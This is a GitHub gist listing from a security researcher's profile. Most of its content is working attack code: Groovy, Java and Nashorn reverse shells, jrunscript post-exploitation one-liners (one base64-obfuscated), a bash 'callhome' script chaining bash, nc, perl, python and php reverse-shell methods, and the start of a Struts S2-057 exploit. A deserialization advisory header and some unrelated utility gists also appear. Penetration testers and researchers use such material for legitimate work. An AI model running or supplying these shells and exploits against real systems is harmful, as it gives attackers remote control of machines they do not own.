Skip to content

Instantly share code, notes, and snippets.

Chris Frohoff frohoff

  • San Diego, CA
Block or report user

Report or block frohoff

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@frohoff
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active Oct 14, 2019
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@frohoff
frohoff / JAVA-ADVISORY.md
Last active Sep 5, 2019
Java 7u21 Security Advisory
View JAVA-ADVISORY.md

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@frohoff
frohoff / revsh.js
Created Mar 22, 2016
Nashorn Javascript Reverse Shell
View revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@frohoff
frohoff / 14seg.py
Created Dec 17, 2018
14 segment display ascii renderer
View 14seg.py
#!/usr/bin/python
# $ echo bcefgG il | python 14seg.py
#
# | | |
# -- --
# | | |
import string
import sys
@frohoff
frohoff / callhome.sh
Last active Oct 27, 2018
Shell script that attempts multiple methods for creating a reverse shell
View callhome.sh
#!/bin/bash
host=$1
port=$2
bash -i >& /dev/tcp/$host/$port 0>&1
nc -e /bin/sh $host $port
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
@frohoff
frohoff / s2-057.py
Created Aug 23, 2018
Struts S2-057 PoC exploit
View s2-057.py
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
import urllib2
if len(sys.argv) != 3:
print 'Usage: %s [url] [command]' % sys.argv[0]
exit(1)
@frohoff
frohoff / README.md
Last active Apr 30, 2018 — forked from TrueFurby/README.md
UserScript: Github Links to Star Badges
@frohoff
frohoff / docker-compose-commands.txt
Created Sep 8, 2017
docker-compose command usage/options
View docker-compose-commands.txt
$ docker-compose 2>&1 | grep -E ' [a-z]+ ' | awk '{print $1}' | xargs -n1 -I{} docker-compose {} -h 2>&1 | grep -E '^\s*(Usage:|-+[a-z])'
Usage: build [options] [--build-arg key=val...] [SERVICE...]
--force-rm Always remove intermediate containers.
--no-cache Do not use cache when building the image.
--pull Always attempt to pull a newer version of the image.
--build-arg key=val Set build-time variables for one service.
Usage: bundle [options]
--push-images Automatically push images for any services
-o, --output PATH Path to write the bundle file to.
Usage: config [options]
@frohoff
frohoff / versions.yml
Last active Sep 8, 2017
travis-ci osx image jdk versions
View versions.yml
# https://github.com/frohoff/travistest
# https://github.com/travis-ci/docs-travis-ci-com/issues/593
# https://docs.travis-ci.com/user/reference/osx/#OS-X-Version
osx_image: xcode9 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.3 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.2 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.1 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8 # oraclejdk8 1.8.0_92-b14
osx_image: xcode7.3 # oraclejdk8 1.8.0_74-b02
osx_image: xcode7.2 # oraclejdk8 1.8.0_66-b17
You can’t perform that action at this time.